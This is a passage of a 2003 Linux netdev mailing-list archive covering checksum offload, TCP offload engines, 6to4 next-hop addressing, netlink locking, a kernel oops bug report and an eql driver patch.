> > Anyway, if you want to apply such specific policy, you can add a flag > to rtm_flags, which would say: RTM_F_OFFICIALLY_PREFIX and base filtering > on this flag, when it is given. > > Alexey > From ralph@istop.com Tue Jul 15 11:36:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:36:16 -0700 (PDT) Received: from smtp.istop.com (dci.doncaster.on.ca [66.11.168.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FIaAFl005851 for ; Tue, 15 Jul 2003 11:36:11 -0700 Received: from ns.istop.com (ns.istop.com [66.11.168.199]) by smtp.istop.com (Postfix) with ESMTP id 4315836957; Tue, 15 Jul 2003 14:36:10 -0400 (EDT) Date: Tue, 15 Jul 2003 14:36:10 -0400 (EDT) From: Ralph Doncaster Reply-To: ralph+d@istop.com To: Dan Hollis Cc: linux-netdev Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4062 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ralph@istop.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Dan Hollis wrote: > That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates This still doesn't make any sense. The copy from user-space to kernel space does the checksum as far as I recall (unless you use the router-not-host kernel build option). 
-Ralph From ralph@istop.com Tue Jul 15 12:01:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 12:01:22 -0700 (PDT) Received: from smtp.istop.com (dci.doncaster.on.ca [66.11.168.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FJ1DFl006764 for ; Tue, 15 Jul 2003 12:01:13 -0700 Received: from ns.istop.com (ns.istop.com [66.11.168.199]) by smtp.istop.com (Postfix) with ESMTP id 53C6236A27; Tue, 15 Jul 2003 15:01:12 -0400 (EDT) Date: Tue, 15 Jul 2003 15:01:11 -0400 (EDT) From: Ralph Doncaster Reply-To: ralph+d@istop.com To: Jordi Ros Cc: "netdev@oss.sgi.com" Subject: RE: TCP IP Offloading Interface In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4063 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ralph@istop.com Precedence: bulk X-list: netdev On Mon, 14 Jul 2003, Jordi Ros wrote: > Note that Microsoft is considering TOE under its Scalable Networking Program. To keep linux competitive, I would encourage a healthy discussion on this matter. Again, TOE is not the goal but the means to deliver important technologies for the next generation of servers. This will be critical as the backbone of the Internet goes to all optical networks while the servers stay at the electronic domain. As shown by McKeown, "Circuit Switching in the Core", the line capacity of the optical fibers is doubling every 7 months while the processing CPU capacity (Moore's law) can only double every 18 months. Moore's law is borne out in practice; most optical transmission developments are theory. 3 years ago the fastest circuit you could readily buy from a carrier (QWest, 360, Williams, etc) was OC192. Today I still can't contact a rep from any of those companies and order an OC768.
Even so, as things currently stand in Linux, an application can send a stream of data from a file on disk to the network without any of the data touching the CPU. So we really don't need any new and convoluted way of accelerating network performance. > PROPRIETARY-CONFIDENTIAL INFORMATION INCLUDED And you expect to be taken seriously when you include a stupid disclaimer like this at the end of your email? -Ralph From goemon@anime.net Tue Jul 15 12:21:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 12:21:09 -0700 (PDT) Received: from sasami.anime.net (sasami.anime.net [208.8.184.120] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FJL4Fl007542 for ; Tue, 15 Jul 2003 12:21:05 -0700 Received: from localhost (goemon@localhost) by sasami.anime.net (8.11.6/8.11.6) with ESMTP id h6FJKtJ07613; Tue, 15 Jul 2003 12:20:55 -0700 Date: Tue, 15 Jul 2003 12:20:55 -0700 (PDT) From: Dan Hollis To: ralph+d@istop.com cc: linux-netdev Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4064 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: goemon@anime.net Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Ralph Doncaster wrote: > On Tue, 15 Jul 2003, Dan Hollis wrote: > > That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates > This still doesn't make any sense. The copy from user-space to kernel > space does the checksum as far as I recall (unless you use the > router-not-host kernel build option). except that 2.5.x has zerocopy and I believe NFS supports it now as well fwiw I believe sendfile() implementation was motivated a lot by hw csum support... -Dan -- [-] Omae no subete no kichi wa ore no mono da. 
[-] From pekkas@netcore.fi Tue Jul 15 12:26:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 12:26:47 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FJQZFl007958 for ; Tue, 15 Jul 2003 12:26:36 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6FJQLM15235; Tue, 15 Jul 2003 22:26:21 +0300 Date: Tue, 15 Jul 2003 22:26:21 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <200307151428.SAA08491@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4065 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > 1) modify /sbin/ip and /sbin/route (and the rest if any) so that they'll > > parse global next-hop information and resolve it for the kernel, and > > report the resolved information to the kernel (see the other thread) > > No, really. It is problem of user to supply reasonable values. Such addresses are link-locals, of link local scope only. A link-local IPv6 address is awfully difficult to remember and type for all of your possible links. The only reasonable value user could supply is a global address. If the user doesn't have to supply anything .. that's another thing. > Listen, tunnel needs an _IPv4_ address for destiantion of tunnel. > Because our routing does not permit to use different address family > as nexthop, we did trick presenting it as an IPv4-compat address. > We could do this differently, f.e. to use FFFF:EEEE:IPv4-addr:CCCC:DDDD > with the same success or any other randomly chosen encapsulation. 
> > And this silly combination is still _better_ than 6to4 address, which > contains redundant information, which can be mixed up with real _IPv6_ > 6to4 addresses and which contains IPv4 address in some place which > used to be identification of a network prefix. Note that what is redundant information in certain scenarios for the *kernel* may not be redundant information for the *user*. Please describe what you mean by "real IPv6 6to4 addresses". If the node processing those as a next-hop supports 6to4 and has the sit0 pseudointerface configured, the address will be put through the special handling. If the node doesn't support 6to4 or doesn't have the sit0 pseudointerface configured, the address will be processed as normal, as any other IPv6 nexthop. Right? I fail to see what's the fuss about redundant information. Redundant information can be ignored. This is not computer science theory, removing everything which is not directly relevant. The use of the same representation for the next-hop (2002:F00:BA::x) as an address (2002:BA:F00:y) is the only logical, user-friendly way. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R.
Martin: A Clash of Kings From akpm@osdl.org Tue Jul 15 12:59:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 12:59:13 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FJx2Fl008852 for ; Tue, 15 Jul 2003 12:59:03 -0700 Received: from dhcp-140-237.pao.digeo.com (build.pdx.osdl.net [172.20.1.2]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6FJwQI16852; Tue, 15 Jul 2003 12:58:26 -0700 Date: Tue, 15 Jul 2003 12:51:21 -0700 From: Andrew Morton To: Jim Keniston Cc: jmorris@intercode.com.au, davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com Subject: Re: [PATCH] [1/2] kernel error reporting (revised) Message-Id: <20030715125121.315920a2.akpm@osdl.org> In-Reply-To: <3F143D0A.A052F0B6@us.ibm.com> References: <3F143D0A.A052F0B6@us.ibm.com> X-Mailer: Sylpheed version 0.9.0pre1 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4066 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@osdl.org Precedence: bulk X-list: netdev Jim Keniston wrote: > > +int kernel_error_event_iov(const struct iovec *iov, unsigned int nseg, > + u32 groups) > +{ > ... > + > + return netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC); This appears to be deadlocky when called from interrupt handlers. netlink_broadcast() does read_lock(&nl_table_lock). But nl_table_lock is not an irq-safe lock. Possibly netlink_broadcast() can be made callable from hardirq context, but it looks to be non trivial. The various error and delivery handlers need to be reviewed, the kfree_skb() calls should be thought about, etc. 
From bwindle@fint.org Tue Jul 15 14:46:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 14:46:35 -0700 (PDT) Received: from mta02-srv.alltel.net (mta02.alltel.net [166.102.165.144]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FLkPFl012968 for ; Tue, 15 Jul 2003 14:46:26 -0700 Received: from morpheus ([151.213.163.48]) by mta02-srv.alltel.net with ESMTP id <20030715214624.MEHY7705.mta02-srv.alltel.net@morpheus>; Tue, 15 Jul 2003 16:46:24 -0500 Received: from bwindle (helo=localhost) by morpheus with local-esmtp (Exim 3.36 #1 (Debian)) id 19cXct-0000yy-00; Tue, 15 Jul 2003 17:46:23 -0400 Date: Tue, 15 Jul 2003 17:46:22 -0400 (EDT) From: Burton Windle X-X-Sender: bwindle@morpheus To: davem@redhat.com cc: netdev@oss.sgi.com Subject: 2.6.0-test1: oops in raw_rcv_skb Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4067 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bwindle@fint.org Precedence: bulk X-list: netdev Hello. Forgive me if you don't want to see these; I already filed it at bugzilla.kernel.org (http://bugzilla.kernel.org/show_bug.cgi?id=937), but thought I saw in the list you wanted them emailed to the maintainers as well.
When doing a ping flood of another machine on my same network (using multiple instances of 'ping -f hostname &'), after about 10 seconds I get this oops, and the machine hangs: Unable to handle kernel paging request at virtual address c4f66068 printing eip: c02b6bd0 *pde = 00014067 *pte = 04f66000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[] Not tainted EFLAGS: 00010246 EIP is at raw_rcv_skb+0x190/0x260 eax: 00000040 ebx: c5321060 ecx: c4dae024 edx: 00000014 esi: c5160000 edi: c5321004 ebp: c4f66004 esp: c5161b80 ds: 007b es: 007b ss: 0068 Process ping (pid: 294, threadinfo=c5160000 task=c52cf000) Stack: c4f66000 c1169890 00001000 c532106c 00000216 00000000 c4f66000 0000005a c4f66004 c5321004 c4dae024 c510e004 c02b6d3d c5321004 c4f66004 c510e038 00000030 00000001 c5321004 c02b681d c5321004 c4f66004 6164050a 1964050a Call Trace: [] raw_rcv+0x9d/0x110 [] raw_v4_input+0xad/0x160 [] ip_local_deliver+0x9b/0x220 [] ip_rcv+0x396/0x49c [] kernel_map_pages+0x28/0x5c [] netif_receive_skb+0x181/0x210 [] process_backlog+0x89/0x120 [] net_rx_action+0x95/0x130 [] do_softirq+0xd5/0xe0 [] do_IRQ+0x185/0x230 [] common_interrupt+0x18/0x20 [] alloc_ldt+0x7b/0x1f0 [] kfree+0x204/0x340 [] kfree_skbmem+0x13/0x30 [] kfree_skbmem+0x13/0x30 [] __kfree_skb+0x6b/0xf0 [] raw_recvmsg+0x113/0x180 [] inet_recvmsg+0x5a/0x80 [] sock_recvmsg+0x9c/0xc0 [] kernel_map_pages+0x28/0x5c [] __alloc_pages+0x309/0x370 [] sockfd_lookup+0x1c/0x80 [] sys_recvfrom+0xb2/0x120 [] poll_freewait+0x44/0x50 [] do_select+0x1f1/0x340 [] sys_socketcall+0x1e6/0x2a0 [] syscall_call+0x7/0xb Code: 8b 45 64 89 3c 24 89 44 24 04 ff 97 50 01 00 00 eb b2 e8 59 <0>Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing Distribution: Debian Testing Hardware Environment: Dual Pentium2 266, AIC-7880 SCSI, 3Com PCI 3c905C Tornado Software Environment: gcc 3.3.1, SMP kernel, preempt on -- Burton Windle burton@fint.org Linux: the "grim reaper of innocent orphaned children." 
from /usr/src/linux-2.4.18/init/main.c:461 From jgarzik@pobox.com Tue Jul 15 15:30:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 15:31:04 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Z61Bcb52iN7sFbON3raqXd1Z+ywnS3Q/@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FMUjFl014372 for ; Tue, 15 Jul 2003 15:30:46 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19cYJn-0001m6-L2; Tue, 15 Jul 2003 23:30:43 +0100 Message-ID: <3F14807E.30402@pobox.com> Date: Tue, 15 Jul 2003 18:30:22 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: ralph+d@istop.com CC: Dan Hollis , linux-netdev Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4068 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Ralph Doncaster wrote: > On Tue, 15 Jul 2003, Dan Hollis wrote: > > >>That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates > > > This still doesn't make any sense. The copy from user-space to kernel > space does the checksum as far as I recall (unless you use the > router-not-host kernel build option). Not for the zero-copy case. 
Jeff From shemminger@osdl.org Tue Jul 15 15:57:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 15:57:51 -0700 (PDT) Received: from mail.osdl.org (login.osdl.org [65.172.181.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FMvjFl015181 for ; Tue, 15 Jul 2003 15:57:46 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6FMvXI05437; Tue, 15 Jul 2003 15:57:33 -0700 Date: Tue, 15 Jul 2003 15:57:33 -0700 From: Stephen Hemminger To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] dynamic net_device for serial eql balancer Message-Id: <20030715155733.0ee5a14d.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4069 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Patch against 2.6.0-test1 to dynamically allocate pseudo network device. Compiles and loaded/unloaded but don't have multi-port serial load balancing to test more fully. diff -Nru a/drivers/net/eql.c b/drivers/net/eql.c --- a/drivers/net/eql.c Tue Jul 15 15:50:48 2003 +++ b/drivers/net/eql.c Tue Jul 15 15:50:48 2003 @@ -162,22 +162,12 @@ static char version[] __initdata = "Equalizer2002: Simon Janes (simon@ncm.com) and David S. 
Miller (davem@redhat.com)\n"; -static int __init eql_init(struct net_device *dev) +static void __init eql_setup(struct net_device *dev) { - static unsigned int version_printed; - equalizer_t *eql; + equalizer_t *eql = dev->priv; SET_MODULE_OWNER(dev); - if (version_printed++ == 0) - printk(version); - - dev->priv = kmalloc(sizeof (equalizer_t), GFP_KERNEL); - if (dev->priv == NULL) - return -ENOMEM; - memset(dev->priv, 0, sizeof (equalizer_t)); - eql = dev->priv; - init_timer(&eql->timer); eql->timer.data = (unsigned long) dev->priv; eql->timer.expires = jiffies + EQL_DEFAULT_RESCHED_IVAL; @@ -203,8 +193,6 @@ dev->type = ARPHRD_SLIP; dev->tx_queue_len = 5; /* Hands them off fast */ - - return 0; } static int eql_open(struct net_device *dev) @@ -598,23 +586,28 @@ return -EINVAL; } -static struct net_device dev_eql; +static struct net_device *dev_eql; static int __init eql_init_module(void) { - strcpy(dev_eql.name, "eql"); - dev_eql.init = eql_init; - if (register_netdev(&dev_eql) != 0) { - printk("eql: register_netdev() returned non-zero.\n"); - return -EIO; - } - return 0; + int err; + + printk(version); + + dev_eql = alloc_netdev(sizeof(equalizer_t), "eql", eql_setup); + if (!dev_eql) + return -ENOMEM; + + err = register_netdev(dev_eql); + if (err) + kfree(dev_eql); + return err; } static void __exit eql_cleanup_module(void) { - kfree(dev_eql.priv); - unregister_netdev(&dev_eql); + unregister_netdev(dev_eql); + kfree(dev_eql); } module_init(eql_init_module); From davidm@napali.hpl.hp.com Tue Jul 15 16:02:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:02:14 -0700 (PDT) Received: from palrel10.hp.com (palrel10.hp.com [156.153.255.245]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FN26Fl015587 for ; Tue, 15 Jul 2003 16:02:07 -0700 Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel10.hp.com (Postfix) with ESMTP id B6CC71C021D1; Tue, 15 Jul 2003 16:02:05 -0700 (PDT) Received: from napali.hpl.hp.com 
(napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com (8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6FN24AR018477; Tue, 15 Jul 2003 16:02:05 -0700 (PDT) Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6FN24rK003174; Tue, 15 Jul 2003 16:02:04 -0700 Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6FN1tDZ003167; Tue, 15 Jul 2003 16:01:55 -0700 From: David Mosberger MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16148.34787.633496.949441@napali.hpl.hp.com> Date: Tue, 15 Jul 2003 16:01:55 -0700 To: "David S. Miller" Cc: davidm@hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter In-Reply-To: <20030714223822.23b78f9b.davem@redhat.com> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> X-Mailer: VM 7.07 under Emacs 21.2.1 Reply-To: davidm@hpl.hp.com X-URL: http://www.hpl.hp.com/personal/David_Mosberger/ X-archive-position: 4070 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidm@napali.hpl.hp.com Precedence: bulk X-list: netdev >>>>> On Mon, 14 Jul 2003 22:38:22 -0700, "David S. Miller" said: DaveM> But I don't think that's what is happening here, rather the DaveM> PCI controller is "talking" to the CPU's L2 cache with DaveM> coherency transactions on all the data of every packet going DaveM> to the chip. That's true. But shouldn't it be true for both the TSO and non-TSO case? DaveM> Whereas with a sendfile() type setup, the PCI controller is DaveM> going straight to main memory for the data part of the DaveM> packets since the CPU is unlikely to have each page cache DaveM> page in it's L2 caches. But sendfile() was _not_ used in any of the tests. 
The ftp server installed on the machine doesn't use it (not to my knowledge, at least) and netperf only uses it for the SENDFILE test. DaveM> I know how this can be fixed, can you use L2-bypassing stores DaveM> in your csum_and_copy_from_user() and copy_from_user() DaveM> implementations like we do on sparc64? That would exactly DaveM> eliminate this situation where the card is talking to the DaveM> cpu's L2 cache for all the data during the PCI DMA transaction DaveM> on the send side. We could, but would it always be a win? Especially for copy_from_user(). Most of the time, that data remains cached, so I don't think we'd want to use non-temporal stores on those (in general). csum_and_copy_from_user() isn't well optimized yet. Let's see if I can find a volunteer... ;-) --david From kuznet@ms2.inr.ac.ru Tue Jul 15 16:11:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:11:32 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FNBPFl016097 for ; Tue, 15 Jul 2003 16:11:26 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA09663; Wed, 16 Jul 2003 03:10:47 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307152310.DAA09663@dub.inr.ac.ru> Subject: Re: [PATCH] [1/2] kernel error reporting (revised) To: akpm@osdl.org (Andrew Morton) Date: Wed, 16 Jul 2003 03:10:47 +0400 (MSD) Cc: jkenisto@us.ibm.com, jmorris@intercode.com.au, davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru In-Reply-To: <20030715125121.315920a2.akpm@osdl.org> from "Andrew Morton" at Jul 15, 2003 12:51:21 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4071 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: 
kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > netlink_broadcast() does read_lock(&nl_table_lock). But nl_table_lock is > not an irq-safe lock. Just as reminder, there are _no_ irq safe locks in net/*. A few of local_irq_disable()s are segregated in interface to device drivers. > Possibly netlink_broadcast() can be made callable from hardirq context, but > it looks to be non trivial. Trivial or non-trivial, before all this is highly not desired. net/* is better to remain in the form free of knowledge of hardirqs. Alexey From kuznet@ms2.inr.ac.ru Tue Jul 15 16:19:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:19:21 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FNJGFl016522 for ; Tue, 15 Jul 2003 16:19:17 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA09683; Wed, 16 Jul 2003 03:19:00 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307152319.DAA09683@dub.inr.ac.ru> Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked To: pekkas@netcore.fi (Pekka Savola) Date: Wed, 16 Jul 2003 03:19:00 +0400 (MSD) Cc: davem@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at Jul 15, 2003 08:29:11 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4072 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Assume you're a host on a link with prefix 3FFE:FFFF:A:B::/64. The router > is the one with interface ID one. Not going to work. Host autoconfiguration conventions have nothing to do with real addressing. Proceeding in this way you will denounce neighbour discovery, what the hell to do this when hw address can be recovered from EUI64 token? :-) > What happens when you do "ping6 3FFE:FFFF:A:B::1" ? 
Hey, you have lost track, rewind several mails ago. Of course, ping and any other protocols will work, how can it not work? :-) Alexey From kuznet@ms2.inr.ac.ru Tue Jul 15 16:33:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:33:20 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FNXAFl017092 for ; Tue, 15 Jul 2003 16:33:11 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA09710; Wed, 16 Jul 2003 03:32:03 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307152332.DAA09710@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: pekkas@netcore.fi (Pekka Savola) Date: Wed, 16 Jul 2003 03:32:03 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at éÀÌ 15, 2003 10:26:21 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4073 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Such addresses are link-locals, of link local scope only. A link-local > IPv6 address is awfully difficult to remember and type for all of your > possible links. > > The only reasonable value user could supply is a global address. So what? I do not see connection to previous. You want to live with global addresses as nexthop? OK. But I remember you have spoken something quite opposite yesterday. > Please describe what you mean by "real IPv6 6to4 addresses". ... > If the node processing those as a next-hop supports 6to4 and has the sit0 > pseudointerface configured, the address will be but through the special > handling. > > If the node doesn't support 6to4 or doesn't have the sit0 pseudointerface > configured, the address will be processed as normal, as any other IPv6 > nexthop. 
> > Right? I do not understand why did you ask previous question. You answered to this. > Redundant information can be ignored. This is not computer science > theory, removing everything which is not directly relevant. The use of > the same representation for the next-hop (2002:F00:BA::x) as an address > (2002:BA:F00:y) is the only logical, user-friendly way. What a bullshit... The second is address of host "x". The first is supposed to be address of host F00:BA, whatever it is. Probably, you can decrypt this only because poisoned by computer science. :-) Just to complete discussion, let's stay on format fe80::A.B.C.D, for example. Unlike anothers it is 100% logically clean. :-) Alexey From ja@ssi.bg Tue Jul 15 16:36:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:36:56 -0700 (PDT) Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FNamFl017447 for ; Tue, 15 Jul 2003 16:36:50 -0700 Received: from localhost (IDENT:ja@localhost [127.0.0.1]) by u.domain.uli (8.11.6/8.11.6) with ESMTP id h6FNf0v15059; Wed, 16 Jul 2003 02:41:00 +0300 Date: Wed, 16 Jul 2003 02:41:00 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@u.domain.uli To: "David S. Miller" cc: netdev@oss.sgi.com Subject: [patches] invalid nh.raw use after free Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="1607745702-670464987-1058312460=:14682" X-archive-position: 4074 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. 
